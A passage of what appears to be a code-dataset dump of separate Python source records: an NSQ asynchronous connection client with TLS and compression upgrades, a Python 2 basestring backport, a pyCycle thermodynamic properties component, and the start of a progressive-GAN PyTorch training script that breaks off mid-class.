self.requeue_delay = requeue_delay\n self.io_loop = io_loop\n if not self.io_loop:\n self.io_loop = tornado.ioloop.IOLoop.instance()\n\n self.output_buffer_size = output_buffer_size\n self.output_buffer_timeout = output_buffer_timeout\n self.sample_rate = sample_rate\n self.user_agent = user_agent\n\n self._authentication_required = False # tracking server auth state\n self.auth_secret = auth_secret\n\n self.socket = None\n self.stream = None\n self._features_to_enable = []\n\n self.last_rdy = 
0\n self.rdy = 0\n\n self.callback_queue = []\n\n super(AsyncConn, self).__init__()\n\n @property\n def id(self):\n return str(self)\n\n def __str__(self):\n return self.host + ':' + str(self.port)\n\n def connected(self):\n return self.state == CONNECTED\n\n def connecting(self):\n return self.state == CONNECTING\n\n def closed(self):\n return self.state in (INIT, DISCONNECTED)\n\n def connect(self):\n if not self.closed():\n return\n\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.settimeout(self.timeout)\n self.socket.setblocking(0)\n\n self.stream = tornado.iostream.IOStream(self.socket, io_loop=self.io_loop)\n self.stream.set_close_callback(self._socket_close)\n self.stream.set_nodelay(True)\n\n self.state = CONNECTING\n self.on(event.CONNECT, self._on_connect)\n self.on(event.DATA, self._on_data)\n\n self.stream.connect((self.host, self.port), self._connect_callback)\n\n def _connect_callback(self):\n self.state = CONNECTED\n self.stream.write(protocol.MAGIC_V2)\n self._start_read()\n self.trigger(event.CONNECT, conn=self)\n\n def _read_bytes(self, size, callback):\n try:\n self.stream.read_bytes(size, callback)\n except IOError:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.ConnectionClosedError('Stream is closed'),\n )\n\n def _start_read(self):\n self._read_bytes(4, self._read_size)\n\n def _socket_close(self):\n self.state = DISCONNECTED\n self.trigger(event.CLOSE, conn=self)\n\n def close(self):\n self.stream.close()\n\n def _read_size(self, data):\n try:\n size = struct_l.unpack(data)[0]\n except Exception:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.IntegrityError('failed to unpack size'),\n )\n return\n self._read_bytes(size, self._read_body)\n\n def _read_body(self, data):\n try:\n self.trigger(event.DATA, conn=self, data=data)\n except Exception:\n logger.exception('uncaught exception in data event')\n self._start_read()\n\n def send(self, data):\n self.stream.write(data)\n\n def upgrade_to_tls(self, options=None):\n assert ssl, 'tls_v1 requires Python 2.6+ or Python 2.5 w/ pip install ssl'\n\n # in order to upgrade to TLS we need to *replace* the IOStream...\n #\n # first remove the event handler for the currently open socket\n # so that when we add the socket to the new SSLIOStream below,\n # it can re-add the appropriate event handlers.\n self.io_loop.remove_handler(self.socket.fileno())\n\n opts = {\n 'cert_reqs': ssl.CERT_REQUIRED,\n 'ca_certs': default_ca_certs()\n }\n opts.update(options or {})\n self.socket = ssl.wrap_socket(self.socket, ssl_version=ssl.PROTOCOL_TLSv1,\n do_handshake_on_connect=False, **opts)\n\n self.stream = tornado.iostream.SSLIOStream(self.socket, io_loop=self.io_loop)\n self.stream.set_close_callback(self._socket_close)\n\n # now that the IOStream has been swapped we can kickstart\n # the SSL handshake\n self.stream._do_ssl_handshake()\n\n def upgrade_to_snappy(self):\n assert SnappySocket, 'snappy requires the python-snappy package'\n\n # in order to upgrade to Snappy we need to use whatever IOStream\n # is currently in place (normal or SSL)...\n #\n # first read any compressed bytes the existing IOStream might have\n # already buffered and use that to bootstrap the SnappySocket, then\n # monkey patch the existing IOStream by replacing its socket\n # with a wrapper that will automagically handle compression.\n existing_data = self.stream._consume(self.stream._read_buffer_size)\n self.socket = SnappySocket(self.socket)\n 
self.socket.bootstrap(existing_data)\n self.stream.socket = self.socket\n\n def upgrade_to_deflate(self):\n # in order to upgrade to DEFLATE we need to use whatever IOStream\n # is currently in place (normal or SSL)...\n #\n # first read any compressed bytes the existing IOStream might have\n # already buffered and use that to bootstrap the DefalteSocket, then\n # monkey patch the existing IOStream by replacing its socket\n # with a wrapper that will automagically handle compression.\n existing_data = self.stream._consume(self.stream._read_buffer_size)\n self.socket = DeflateSocket(self.socket, self.deflate_level)\n self.socket.bootstrap(existing_data)\n self.stream.socket = self.socket\n\n def send_rdy(self, value):\n try:\n self.send(protocol.ready(value))\n except Exception as e:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.SendError('failed to send RDY %d' % value, e),\n )\n return False\n self.last_rdy = value\n self.rdy = value\n return True\n\n def _on_connect(self, **kwargs):\n identify_data = {\n 'short_id': self.short_hostname, # TODO remove when deprecating pre 1.0 support\n 'long_id': self.hostname, # TODO remove when deprecating pre 1.0 support\n 'client_id': self.short_hostname,\n 'hostname': self.hostname,\n 'heartbeat_interval': self.heartbeat_interval,\n 'feature_negotiation': True,\n 'tls_v1': self.tls_v1,\n 'snappy': self.snappy,\n 'deflate': self.deflate,\n 'deflate_level': self.deflate_level,\n 'output_buffer_timeout': self.output_buffer_timeout,\n 'output_buffer_size': self.output_buffer_size,\n 'sample_rate': self.sample_rate,\n 'user_agent': self.user_agent\n }\n if self.msg_timeout:\n identify_data['msg_timeout'] = self.msg_timeout\n self.trigger(event.IDENTIFY, conn=self, data=identify_data)\n self.on(event.RESPONSE, self._on_identify_response)\n try:\n self.send(protocol.identify(identify_data))\n except Exception as e:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.SendError('failed to bootstrap connection', e),\n )\n\n def _on_identify_response(self, data, **kwargs):\n self.off(event.RESPONSE, self._on_identify_response)\n\n if data == b'OK':\n logger.warning('nsqd version does not support feature netgotiation')\n return self.trigger(event.READY, conn=self)\n\n try:\n data = json.loads(data.decode('utf-8'))\n except ValueError:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.IntegrityError(\n 'failed to parse IDENTIFY response JSON from nsqd - %r' %\n data\n ),\n )\n return\n\n self.trigger(event.IDENTIFY_RESPONSE, conn=self, data=data)\n\n if self.tls_v1 and data.get('tls_v1'):\n self._features_to_enable.append('tls_v1')\n if self.snappy and data.get('snappy'):\n self._features_to_enable.append('snappy')\n if self.deflate and data.get('deflate'):\n self._features_to_enable.append('deflate')\n\n if data.get('auth_required'):\n self._authentication_required = True\n\n if data.get('max_rdy_count'):\n self.max_rdy_count = data.get('max_rdy_count')\n else:\n # for backwards compatibility when interacting with older nsqd\n # (pre 0.2.20), default this to their hard-coded max\n logger.warn('setting max_rdy_count to default value of 2500')\n self.max_rdy_count = 2500\n\n self.on(event.RESPONSE, self._on_response_continue)\n self._on_response_continue(conn=self, data=None)\n\n def _on_response_continue(self, data, **kwargs):\n if self._features_to_enable:\n feature = self._features_to_enable.pop(0)\n if feature == 'tls_v1':\n self.upgrade_to_tls(self.tls_options)\n elif feature == 
'snappy':\n self.upgrade_to_snappy()\n elif feature == 'deflate':\n self.upgrade_to_deflate()\n # the server will 'OK' after these conneciton upgrades triggering another response\n return\n\n self.off(event.RESPONSE, self._on_response_continue)\n if self.auth_secret and self._authentication_required:\n self.on(event.RESPONSE, self._on_auth_response)\n self.trigger(event.AUTH, conn=self, data=self.auth_secret)\n try:\n self.send(protocol.auth(self.auth_secret))\n except Exception as e:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.SendError('Error sending AUTH', e),\n )\n return\n self.trigger(event.READY, conn=self)\n\n def _on_auth_response(self, data, **kwargs):\n try:\n data = json.loads(data.decode('utf-8'))\n except ValueError:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.IntegrityError(\n 'failed to parse AUTH response JSON from nsqd - %r' % data\n ),\n )\n return\n\n self.off(event.RESPONSE, self._on_auth_response)\n self.trigger(event.AUTH_RESPONSE, conn=self, data=data)\n return self.trigger(event.READY, conn=self)\n\n def _on_data(self, data, **kwargs):\n self.last_recv_timestamp = time.time()\n frame, data = protocol.unpack_response(data)\n if frame == protocol.FRAME_TYPE_MESSAGE:\n self.last_msg_timestamp = time.time()\n self.in_flight += 1\n\n message = protocol.decode_message(data)\n message.on(event.FINISH, self._on_message_finish)\n message.on(event.REQUEUE, self._on_message_requeue)\n message.on(event.TOUCH, self._on_message_touch)\n\n self.trigger(event.MESSAGE, conn=self, message=message)\n elif frame == protocol.FRAME_TYPE_RESPONSE and data == b'_heartbeat_':\n self.send(protocol.nop())\n self.trigger(event.HEARTBEAT, conn=self)\n elif frame == protocol.FRAME_TYPE_RESPONSE:\n self.trigger(event.RESPONSE, conn=self, data=data)\n elif frame == protocol.FRAME_TYPE_ERROR:\n self.trigger(event.ERROR, conn=self, error=protocol.Error(data))\n\n def _on_message_requeue(self, message, backoff=True, time_ms=-1, **kwargs):\n if backoff:\n self.trigger(event.BACKOFF, conn=self)\n else:\n self.trigger(event.CONTINUE, conn=self)\n\n self.in_flight -= 1\n try:\n time_ms = self.requeue_delay * message.attempts * 1000 if time_ms < 0 else time_ms\n self.send(protocol.requeue(message.id, time_ms))\n except Exception as e:\n self.close()\n self.trigger(event.ERROR, conn=self, error=protocol.SendError(\n 'failed to send REQ %s @ %d' % (message.id, time_ms), e))\n\n def _on_message_finish(self, message, **kwargs):\n self.trigger(event.RESUME, conn=self)\n\n self.in_flight -= 1\n try:\n self.send(protocol.finish(message.id))\n except Exception as e:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.SendError('failed to send FIN %s' % message.id, e),\n )\n\n def _on_message_touch(self, message, **kwargs):\n try:\n self.send(protocol.touch(message.id))\n except Exception as e:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.SendError('failed to send TOUCH %s' % message.id, e),\n )\n"} {"ext": "py", "sha": "1a2ec646960eff1682cce5b130079d8d55d99466", "content": "\"\"\"\r\nAn implementation of the basestring type for Python 3\r\n\r\nExample use:\r\n\r\n>>> s = b'abc'\r\n>>> assert isinstance(s, basestring)\r\n>>> from past.types import str as oldstr\r\n>>> s2 = oldstr(b'abc')\r\n>>> assert isinstance(s2, basestring)\r\n\r\n\"\"\"\r\n\r\nimport sys\r\n\r\nfrom past.utils import with_metaclass, PY2\r\n\r\nif PY2:\r\n str = unicode\r\n\r\nver = sys.version_info[:2]\r\n\r\n\r\nclass 
BaseBaseString(type):\r\n def __instancecheck__(cls, instance):\r\n return isinstance(instance, (bytes, str))\r\n\r\n def __subclasshook__(cls, thing):\r\n # TODO: What should go here?\r\n raise NotImplemented\r\n\r\n\r\nclass basestring(with_metaclass(BaseBaseString)):\r\n \"\"\"\r\n A minimal backport of the Python 2 basestring type to Py3\r\n \"\"\"\r\n\r\n\r\n__all__ = ['basestring']\r\n"} {"ext": "py", "sha": "1a2ec68c03005c038c6cf0a9646a77ef913b815a", "content": "import numpy as np\n\nfrom openmdao.api import ExplicitComponent\n\nfrom pycycle.constants import P_REF, R_UNIVERSAL_ENG, R_UNIVERSAL_SI, MIN_VALID_CONCENTRATION\n\n\nclass PropsCalcs(ExplicitComponent):\n \"\"\"computes, S, H, Cp, Cv, gamma, given a converged equilibirum mixture\"\"\"\n\n def initialize(self):\n self.options.declare('thermo', desc='thermodynamic data object', recordable=False)\n\n def setup(self):\n\n thermo = self.options['thermo']\n\n self.add_input('T', val=284., units=\"degK\", desc=\"Temperature\")\n self.add_input('P', val=1., units='bar', desc=\"Pressure\")\n self.add_input('n', val=np.ones(thermo.num_prod),\n desc=\"molar concentration of the mixtures, last element is the total molar concentration\")\n self.add_input('n_moles', val=1., desc=\"1/molar_mass for gaseous mixture\")\n\n ne1 = thermo.num_element + 1\n self.add_input('result_T', val=np.ones(ne1),\n desc=\"result of the linear solve for T\", shape=ne1)\n self.add_input('result_P', val=np.ones(ne1),\n desc=\"result of the linear solve for T\", shape=ne1)\n\n self.add_output('h', val=1., units=\"cal/g\", desc=\"enthalpy\")\n self.add_output('S', val=1., units=\"cal/(g*degK)\", desc=\"entropy\")\n self.add_output('gamma', val=1.4, lower=1.0, upper=2.0, desc=\"ratio of specific heats\")\n self.add_output('Cp', val=1., units=\"cal/(g*degK)\", desc=\"Specific heat at constant pressure\")\n self.add_output('Cv', val=1., units=\"cal/(g*degK)\", desc=\"Specific heat at constant volume\")\n self.add_output('rho', val=0.0004, units=\"g/cm**3\", desc=\"density\")\n\n self.add_output('R', val=1., units='(N*m)/(kg*degK)', desc='Specific gas constant')\n # self.deriv_options['check_type'] = \"cs\"\n\n # partial derivs setup\n self.declare_partials('h', ['n', 'T'])\n self.declare_partials('S', ['n', 'T', 'P'])\n self.declare_partials('S', 'n_moles')\n self.declare_partials('Cp', ['n', 'T', 'result_T'])\n self.declare_partials('rho', ['T', 'P', 'n_moles'])\n self.declare_partials('gamma', ['n', 'n_moles', 'T', 'result_T', 'result_P'])\n self.declare_partials('Cv', ['n', 'n_moles', 'T', 'result_T', 'result_P'])\n\n self.declare_partials('R', 'n_moles', val=R_UNIVERSAL_SI)\n\n\n def compute(self, inputs, outputs):\n thermo = self.options['thermo']\n num_prod = thermo.num_prod\n num_element = thermo.num_element\n\n T = inputs['T']\n P = inputs['P']\n result_T = inputs['result_T']\n\n nj = inputs['n'][:num_prod]\n # nj[nj<0] = 1e-10 # ensure all concentrations stay non-zero\n n_moles = inputs['n_moles']\n\n self.dlnVqdlnP = dlnVqdlnP = -1 + inputs['result_P'][num_element]\n self.dlnVqdlnT = dlnVqdlnT = 1 - result_T[num_element]\n\n self.Cp0_T = Cp0_T = thermo.Cp0(T)\n Cpf = np.sum(nj*Cp0_T)\n\n self.H0_T = H0_T = thermo.H0(T)\n self.S0_T = S0_T = thermo.S0(T)\n self.nj_H0 = nj_H0 = nj*H0_T\n\n # Cpe = 0\n # for i in range(0, num_element):\n # for j in range(0, num_prod):\n # Cpe -= thermo.aij[i][j]*nj[j]*H0_T[j]*self.result_T[i]\n # vectorization of this for loop for speed\n Cpe = -np.sum(np.sum(thermo.aij*nj_H0, axis=1)*result_T[:num_element])\n Cpe += 
np.sum(nj_H0*H0_T) # nj*H0_T**2\n Cpe -= np.sum(nj_H0)*result_T[num_element]\n\n outputs['h'] = np.sum(nj_H0)*R_UNIVERSAL_ENG*T\n\n try:\n val = (S0_T+np.log(n_moles/nj/(P/P_REF)))\n except FloatingPointError:\n P = 1e-5\n val = (S0_T+np.log(n_moles/nj/(P/P_REF)))\n\n\n outputs['S'] = R_UNIVERSAL_ENG * np.sum(nj*val)\n outputs['Cp'] = Cp = (Cpe+Cpf)*R_UNIVERSAL_ENG\n outputs['Cv'] = Cv = Cp + n_moles*R_UNIVERSAL_ENG*dlnVqdlnT**2/dlnVqdlnP\n\n outputs['gamma'] = -1*Cp/Cv/dlnVqdlnP\n\n outputs['rho'] = P/(n_moles*R_UNIVERSAL_SI*T)*100 # 1 Bar is 100 Kpa\n\n outputs['R'] = R_UNIVERSAL_SI*n_moles #(m**3 * Pa)/(mol*degK)\n\n def compute_partials(self, inputs, J):\n\n thermo = self.options['thermo']\n num_prod = thermo.num_prod\n num_element = thermo.num_element\n\n T = inputs['T']\n P = inputs['P']\n nj = inputs['n']\n n_moles = inputs['n_moles']\n result_T = inputs['result_T']\n result_T_last = result_T[num_element]\n result_T_rest = result_T[:num_element]\n\n dlnVqdlnP = -1 + inputs['result_P'][num_element]\n dlnVqdlnT = 1 - result_T_last\n\n Cp0_T = thermo.Cp0(T)\n Cpf = np.sum(nj * Cp0_T)\n\n H0_T = thermo.H0(T)\n S0_T = thermo.S0(T)\n nj_H0 = nj * H0_T\n\n # Cpe = 0\n # for i in range(0, num_element):\n # for j in range(0, num_prod):\n # Cpe -= thermo.aij[i][j]*nj[j]*H0_T[j]*self.result_T[i]\n # vectorization of this for loop for speed\n Cpe = -np.sum(np.sum(thermo.aij * nj_H0, axis=1) * result_T_rest)\n Cpe += np.sum(nj_H0 * H0_T) # nj*H0_T**2\n Cpe -= np.sum(nj_H0) * result_T_last\n\n Cp = (Cpe + Cpf) * R_UNIVERSAL_ENG\n Cv = Cp + n_moles * R_UNIVERSAL_ENG * dlnVqdlnT ** 2 / dlnVqdlnP\n\n dH0_dT = thermo.H0_applyJ(T, 1.)\n dS0_dT = thermo.S0_applyJ(T, 1.)\n dCp0_dT = thermo.Cp0_applyJ(T, 1.)\n sum_nj_R = n_moles*R_UNIVERSAL_SI\n\n drho_dT = P/(sum_nj_R*T**2)*100\n drho_dnmoles = -P/(n_moles**2*R_UNIVERSAL_SI*T)*100\n\n dCpe_dT = 2*np.sum(nj*H0_T*dH0_dT)\n # for i in range(num_element):\n # self.dCpe_dT -= np.sum(aij[i]*nj*self.dH0_dT)*self.result_T[i]\n dCpe_dT -= np.sum(np.sum(thermo.aij*nj*dH0_dT, axis=1)*result_T_rest)\n dCpe_dT -= np.sum(nj*dH0_dT)*result_T_last\n\n dCpf_dT = np.sum(nj*dCp0_dT)\n\n J['h', 'T'] = R_UNIVERSAL_ENG*(np.sum(nj*dH0_dT)*T + np.sum(nj*H0_T))\n J['h', 'n'] = R_UNIVERSAL_ENG*T*H0_T\n\n J['S', 'n'] = R_UNIVERSAL_ENG*(S0_T + np.log(n_moles) - np.log(P/P_REF) - np.log(nj) - 1)\n # zero out any derivs w.r.t trace species\n _trace = np.where(nj <= MIN_VALID_CONCENTRATION+1e-20)\n J['S', 'n'][0, _trace] = 0\n J['S', 'T'] = R_UNIVERSAL_ENG*np.sum(nj*dS0_dT)\n J['S', 'P'] = -R_UNIVERSAL_ENG*np.sum(nj/P)\n J['S', 'n_moles'] = R_UNIVERSAL_ENG*np.sum(nj)/n_moles\n J['rho', 'T'] = -P/(sum_nj_R*T**2)*100\n J['rho', 'n_moles'] = -P/(n_moles**2*R_UNIVERSAL_SI*T)*100\n J['rho', 'P'] = 1/(sum_nj_R*T)*100\n\n dCp_dnj = R_UNIVERSAL_ENG*(Cp0_T + H0_T**2)\n for j in range(num_prod):\n for i in range(num_element):\n dCp_dnj[j] -= R_UNIVERSAL_ENG*thermo.aij[i][j]*H0_T[j]*result_T[i]\n dCp_dnj -= R_UNIVERSAL_ENG * H0_T * result_T_last\n J['Cp', 'n'] = dCp_dnj\n\n dCp_dresultT = np.zeros(num_element+1, dtype=inputs._data.dtype)\n # for i in range(num_element):\n # self.dCp_dresultT[i] = -R_UNIVERSAL_ENG*np.sum(aij[i]*nj_H0)\n dCp_dresultT[:num_element] = -R_UNIVERSAL_ENG*np.sum(thermo.aij*nj_H0, axis=1)\n dCp_dresultT[num_element] = - R_UNIVERSAL_ENG*np.sum(nj_H0)\n J['Cp', 'result_T'] = dCp_dresultT\n\n dCp_dT = (dCpe_dT + dCpf_dT)*R_UNIVERSAL_ENG\n J['Cp', 'T'] = dCp_dT\n\n J['Cv', 'n'] = dCp_dnj\n\n dCv_dnmoles = R_UNIVERSAL_ENG*dlnVqdlnT**2/dlnVqdlnP\n J['Cv', 'n_moles'] = 
dCv_dnmoles\n J['Cv', 'T'] = dCp_dT\n\n dCv_dresultP = np.zeros((1, num_element+1), dtype=inputs._data.dtype)\n dCv_dresultP[0, -1] = -R_UNIVERSAL_ENG*n_moles*(dlnVqdlnT/dlnVqdlnP)**2\n J['Cv', 'result_P'] = dCv_dresultP\n\n dCv_dresultT = dCp_dresultT.copy()\n dCv_dresultT[-1] -= n_moles*R_UNIVERSAL_ENG/dlnVqdlnP*(2*dlnVqdlnT)\n dCv_dresultT_last = dCv_dresultT[-1]\n J['Cv', 'result_T'] = dCv_dresultT\n\n J['gamma', 'n'] = dCp_dnj*(Cp/Cv-1)/(dlnVqdlnP*Cv)\n J['gamma', 'n_moles'] = Cp/dlnVqdlnP/Cv**2*dCv_dnmoles\n J['gamma', 'T'] = dCp_dT/dlnVqdlnP/Cv*(Cp/Cv-1)\n\n dgamma_dresultT = np.zeros((1, num_element+1), dtype=inputs._data.dtype)\n dgamma_dresultT[0, :num_element] = 1/Cv/dlnVqdlnP*dCp_dresultT[:num_element]*(Cp/Cv-1)\n dgamma_dresultT[0, -1] = (-dCp_dresultT[-1]/Cv+Cp/Cv**2*dCv_dresultT_last)/dlnVqdlnP\n J['gamma', 'result_T'] = dgamma_dresultT\n\n gamma_dresultP = np.zeros((1, num_element+1), dtype=inputs._data.dtype)\n gamma_dresultP[0, num_element] = Cp/Cv/dlnVqdlnP*(dCv_dresultP[0, -1]/Cv + 1/dlnVqdlnP)\n J['gamma', 'result_P'] = gamma_dresultP\n\n\nif __name__ == \"__main__\":\n\n from openmdao.api import Problem, Group, IndepVarComp\n\n from pycycle.cea import species_data\n\n thermo = species_data.Properties(species_data.co2_co_o2)\n\n p = Problem()\n model = p.model = Group()\n\n indeps = model.add_subsystem('indeps', IndepVarComp(), promotes=['*'])\n indeps.add_output('T', 2761.56784655, units='degK')\n indeps.add_output('P', 1.034210, units='bar')\n indeps.add_output('n', val=np.array([2.272e-02, 1.000e-10, 1.136e-02]))\n indeps.add_output('n_moles', val=0.0340831628675)\n\n indeps.add_output('result_T', val=np.array([-3.02990116, 1.95459777, -0.05024694]))\n indeps.add_output('result_P', val=np.array([0.53047724, 0.48627081, -0.00437025]))\n\n model.add_subsystem('calcs', PropsCalcs(thermo=thermo), promotes=['*'])\n\n p.setup()\n p.run_model()\n\n print(\"outputs\")\n print('h', p['h'])\n print('S', p['S'])\n print('gamma', p['gamma'])\n print('Cp', p['Cp'])\n print('Cv', p['Cv'])\n print('rho', p['rho'])\n print()\n print()\n print('############################################')\n\n p.model.run_linearize()\n\n jac = p.model.get_subsystem('calcs').jacobian._subjacs\n for pair in jac:\n print(pair)\n print(jac[pair])\n print\n"} {"ext": "py", "sha": "1a2ec6b2a0c25e3d2a554547acbe2827f6ab03ee", "content": "import numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\n\nimport torch\nfrom torch import nn, optim\nfrom torch.autograd import Variable, grad\nfrom torchvision import utils\n\nfrom model import Generator, Discriminator\n\nfrom datetime import datetime\nimport random\nimport copy\n\nimport os\n\nimport config\nimport utils\nimport data\nimport evaluate\n\nimport torch.backends.cudnn as cudnn\ncudnn.benchmark = True\n\nfrom torch.nn import functional as F\n\nargs = config.get_config()\nwriter = None\n\ndef batch_size(reso):\n if args.gpu_count == 1:\n save_memory = False\n if not save_memory:\n batch_table = {4:128, 8:128, 16:128, 32:64, 64:32, 128:16, 256:8, 512:4, 1024:1}\n else:\n batch_table = {4:128, 8:128, 16:128, 32:32, 64:16, 128:4, 256:2, 512:2, 1024:1}\n elif args.gpu_count == 2:\n batch_table = {4:256, 8:256, 16:256, 32:128, 64:64, 128:32, 256:16, 512:8, 1024:2}\n elif args.gpu_count == 4:\n batch_table = {4:512, 8:256, 16:128, 32:64, 64:32, 128:32, 256:32, 512:16, 1024:4}\n elif args.gpu_count == 8:\n batch_table = {4:512, 8:512, 16:512, 32:256, 64:256, 128:128, 256:64, 512:32, 1024:8}\n else:\n assert(False)\n \n return batch_table[reso]\n\ndef 
batch_size_by_phase(phase):\n return batch_size(4 * 2 ** phase)\n\nclass Session:\n def __init__(self):\n # Note: 4 requirements for sampling from pre-existing models:\n # 1) Ensure you save and load both multi-gpu versions (DataParallel) or both not.\n # 2) Ensure you set the same phase value as the pre-existing model and that your local and global alpha=1.0 are set\n # 3) Sample from the g_running, not from the latest generator\n # 4) You may need to warm up the g_running by running evaluate.reconstruction_dryrun() first\n\n self.alpha = -1\n self.sample_i = min(args.start_iteration, 0)\n self.phase = args.start_phase\n\n self.generator = nn.DataParallel( Generator(args.nz+1, args.n_label).cuda() )\n self.g_running = nn.DataParallel( Generator(args.nz+1, args.n_label).cuda() )\n self.encoder = nn.DataParallel( Discriminator(nz = args.nz+1, n_label = args.n_label, binary_predictor = args.train_mode == config.MODE_GAN).cuda() )\n\n print(\"Using \", torch.cuda.device_count(), \" GPUs!\")\n\n self.reset_opt()\n\n print('Session created.')\n\n def reset_opt(self):\n self.optimizerG = optim.Adam(self.generator.parameters(), args.lr, betas=(0.0, 0.99))\n self.optimizerD = optim.Adam(self.encoder.parameters(), args.lr, betas=(0.0, 0.99)) # includes all the encoder parameters...\n\n def save_all(self, path):\n torch.save({'G_state_dict': self.generator.state_dict(),\n 'D_state_dict': self.encoder.state_dict(),\n 'G_running_state_dict': self.g_running.state_dict(),\n 'optimizerD': self.optimizerD.state_dict(),\n 'optimizerG': self.optimizerG.state_dict(),\n 'iteration': self.sample_i,\n 'phase': self.phase,\n 'alpha': self.alpha},\n path)\n\n def load(self, path):\n checkpoint = torch.load(path)\n self.sample_i = int(checkpoint['iteration'])\n \n self.generator.load_state_dict(checkpoint['G_state_dict'])\n self.g_running.load_state_dict(checkpoint['G_running_state_dict'])\n self.encoder.load_state_dict(checkpoint['D_state_dict'])\n\n if args.reset_optimizers <= 0:\n self.optimizerD.load_state_dict(checkpoint['optimizerD'])\n self.optimizerG.load_state_dict(checkpoint['optimizerG'])\n print(\"Reloaded old optimizers\")\n else:\n print(\"Despite loading the state, we reset the optimizers.\")\n\n self.alpha = checkpoint['alpha']\n self.phase = int(checkpoint['phase'])\n if args.start_phase > 0: #If the start phase has been manually set, try to actually use it (e.g. when have trained 64x64 for extra rounds and then turning the model over to 128x128)\n self.phase = min(args.start_phase, self.phase)\n print(\"Use start phase: {}\".format(self.phase))\n if self.phase > args.max_phase:\n print('Warning! Loaded model claimed phase {} but max_phase={}'.format(self.phase, args.max_phase))\n self.phase = args.max_phase\n\n def create(self):\n if args.start_iteration <= 0:\n args.start_iteration = 1\n if args.no_progression:\n self.sample_i = args.start_iteration = int( (args.max_phase + 0.5) * args.images_per_stage ) # Start after the fade-in stage of the last iteration\n args.force_alpha = 1.0\n print(\"Progressive growth disabled. Setting start step = {} and alpha = {}\".format(args.start_iteration, args.force_alpha))\n else:\n reload_from = '{}/checkpoint/{}_state'.format(args.save_dir, str(args.start_iteration).zfill(6)) #e.g. 
'604000' #'600000' #latest' \n print(reload_from)\n if os.path.exists(reload_from):\n self.load(reload_from)\n print(\"Loaded {}\".format(reload_from))\n print(\"Iteration asked {} and got {}\".format(args.start_iteration, self.sample_i)) \n\n if args.testonly:\n self.generator = copy.deepcopy(self.g_running)\n else:\n assert(not args.testonly)\n self.sample_i = args.start_iteration\n print('Start from iteration {}'.format(self.sample_i))\n\n self.g_running.train(False)\n\n if args.force_alpha >= 0.0:\n self.alpha = args.force_alpha\n\n accumulate(self.g_running, self.generator, 0)\n\ndef setup():\n utils.make_dirs()\n if not args.testonly:\n config.log_args(args)\n\n if args.use_TB:\n from dateutil import tz\n from tensorboardX import SummaryWriter\n\n dt = datetime.now(tz.gettz('Europe/Helsinki')).strftime(r\"%y%m%d_%H%M\")\n global writer\n writer = SummaryWriter(\"{}/{}/{}\".format(args.summary_dir, args.save_dir, dt))\n\n random.seed(args.manual_seed)\n torch.manual_seed(args.manual_seed)\n torch.cuda.manual_seed_all(args.manual_seed) \n\ndef accumulate(model1, model2, decay=0.999):\n par1 = dict(model1.named_parameters())\n par2 = dict(model2.named_parameters())\n\n for k in par1.keys():\n par1[k].data.mul_(decay).add_(1 - decay, par2[k].data)\n\ndef get_grad_penalty(discriminator, real_image, fake_image, step, alpha):\n \"\"\" Used in WGAN-GP version only. \"\"\"\n eps = torch.rand(batch_size_by_phase(step), 1, 1, 1).cuda()\n\n if eps.size(0) != real_image.size(0) or eps.size(0) != fake_image.size(0):\n # If end-of-batch situation, we restrict other vectors to matcht the number of training images available.\n eps = eps[:real_image.size(0)]\n fake_image = fake_image[:real_image.size(0)]\n\n x_hat = eps * real_image.data + (1 - eps) * fake_image.data\n x_hat = Variable(x_hat, requires_grad=True)\n\n if args.train_mode == config.MODE_GAN: # Regular GAN mode\n hat_predict, _ = discriminator(x_hat, step, alpha, args.use_ALQ)\n grad_x_hat = grad(\n outputs=hat_predict.sum(), inputs=x_hat, create_graph=True)[0]\n else:\n hat_z = discriminator(x_hat, step, alpha, args.use_ALQ)\n # KL_fake: \\Delta( e(g(Z)) , Z ) -> max_e\n KL_maximizer = KLN01Loss(direction=args.KL, minimize=False)\n KL_fake = KL_maximizer(hat_z) * args.fake_D_KL_scale\n grad_x_hat = grad(\n outputs=KL_fake.sum(), inputs=x_hat, create_graph=True)[0]\n\n # Push the gradients of the interpolated samples towards 1\n grad_penalty = ((grad_x_hat.view(grad_x_hat.size(0), -1)\n .norm(2, dim=1) - 1)**2).mean()\n grad_penalty = 10 * grad_penalty\n return grad_penalty\n\ndef D_prediction_of_G_output(generator, encoder, step, alpha):\n # To use labels, enable here and elsewhere:\n #label = Variable(torch.ones(batch_size_by_phase(step), args.n_label)).cuda()\n # label = Variable(\n # torch.multinomial(\n # torch.ones(args.n_label), args.batch_size, replacement=True)).cuda()\n\n myz = Variable(torch.randn(batch_size_by_phase(step), args.nz)).cuda(non_blocking=(args.gpu_count>1))\n myz = utils.normalize(myz)\n myz, label = utils.split_labels_out_of_latent(myz)\n\n fake_image = generator(myz, label, step, alpha)\n fake_predict, _ = encoder(fake_image, step, alpha, args.use_ALQ)\n\n loss = fake_predict.mean()\n return loss, fake_image\n\nclass KLN01Loss(torch.nn.Module): #Adapted from https://github.com/DmitryUlyanov/AGE\n\n def __init__(self, direction, minimize):\n super(KLN01Loss, self).__init__()\n self.minimize = minimize\n assert direction in ['pq', 'qp'], 'direction?'\n\n self.direction = direction\n\n def forward(self, 
